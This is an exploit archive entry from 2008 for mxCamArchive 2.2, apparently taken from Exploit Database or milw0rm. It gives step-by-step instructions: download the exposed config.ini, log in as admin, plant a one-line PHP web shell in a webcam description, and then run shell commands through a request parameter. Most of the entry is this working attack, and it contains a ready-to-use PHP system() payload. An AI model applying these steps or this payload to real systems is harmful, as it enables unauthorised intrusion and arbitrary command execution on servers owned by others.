mxCamArchive 2.2 Bypass Config Download Vulnerability



EDB-ID: 7136 CVE: 2008-6955OSVDB-ID: 49886
Author: ahmadbadyPublished: 2008-11-17Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
************************(Bypass Config Download Vulnerability)*****************
script: mxcamarchive 2.2
***************************************************************************
download from:http://www.infireal.com/media/serve/106/mxcamarchive2.2.zip
***************************************************************************
...........................................................................
expl:
http://site.com/path/archive/config.ini
and login
http://site.com/path/admin
and add new web cam
and Description   '<pre><?@system($_REQUEST["h"]);?></body></pre>'
and save
now:
http://site.com/path/index.php?h=ls -la
***************************************************
***************************************************
Author: ahmadbady  from http://www.deltahacking.net
my mail: kivi_hacker666@yahoo.com
***************************************************
# milw0rm.com [2008-11-17]






Comments

No comments so far